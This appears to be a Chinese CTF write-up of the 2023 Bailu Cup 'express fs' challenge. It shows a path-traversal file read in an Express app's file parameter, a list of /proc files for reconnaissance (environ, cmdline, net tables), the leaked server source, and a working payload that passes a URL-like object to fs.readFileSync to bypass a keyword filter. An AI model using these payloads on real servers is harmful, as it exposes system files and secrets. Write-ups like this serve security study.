2023柏鹭杯 express fs

2023柏鹭杯 express fs_第1张图片

进去看看,发现有个file的参数

查看源码有个?file=check.html,我们尝试?file=/etc/passwd,发现可以直接访问任意文件,但是访问不到flag,可能被waf禁掉了

实际上node不能像php有伪协议可以绕,也没办法用什么编码绕过等,因为url编码后的字符串传递给 fs.readFileSync 后其并不会对得到的字符串进行解码操作,它只是尝试检查文件系统上是否存在与该字符串完全匹配的文件,并且 Unicode 尝试不会起作用。

node.js中fs.readFile和fs.readFileSync的使用-CSDN博客

我们这里尝试读取Linux操作系统中的特殊文件来看看,具体可以使用的payload有这些

/proc/sched_debug # 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用
/proc/mounts # 挂载的文件系统列表
/proc/net/arp # arp表,可以获得内网其他机器的地址
/proc/net/route # 路由表信息
/proc/net/tcp and /proc/net/udp # 活动连接的信息
/proc/net/fib_trie # 路由缓存
/proc/version  # 内核版本
/proc/[PID]/cmdline # 可能包含有用的路径信息
/proc/[PID]/environ #  程序运行的环境变量信息,可以用来包含getshell
/proc/[PID]/cwd     # 当前进程的工作目录
/proc/[PID]/fd/[#] # 访问file descriptors,某写情况可以读取到进程正在使用的文件,比如access.log

我们使用  ?file=/proc/self/environ,得到 server这个路径

使用  ?file=/proc/self/cmdline,得到源码,根据路径可以读取得到

const express = require("express");
const fs = require("fs");
 
const app = express();
 
const PORT = process.env.PORT || 80;
 
app.use('/static', express.static('static'))
 
app.use((req, res, next) => {
  if (
    [req.body, req.headers, req.query].some(
      (item) => item && JSON.stringify(item).includes("flag")
    )
  ) {
    return res.send("臭黑客!");
  }
  next();
});
 
app.get("/", (req, res) => {
  try {
    res.setHeader("Content-Type", "text/html");
    res.send(fs.readFileSync(req.query.file || "index.html").toString());
  } catch (err) {
    console.log(err);
    res.status(500).send("Internal server error");
  }
});
 
app.listen(PORT, () => console.log(`express server listening on port ${PORT}`));

 在其他文章中发现了fs.readFileSync的利用,直接改改poc打就行

2023柏鹭杯 express fs_第2张图片

pathname 是/app/flag.txt URL 编码的(注意:这需要双 URL 编码,因为 Express 已经 URL 解码一次)

奇安信攻防社区-fs.readFileSync的利用 (butian.net)

?file[href]=a&file[origin]=1&file[protocol]=file:&file[hostname]=&file[pathname]=/app/fl%2561g.txt

参考博客:[wp]2023柏鹭杯 express fs-CSDN博客

 

你可能感兴趣的:(复现,express,网络,安全,经验分享)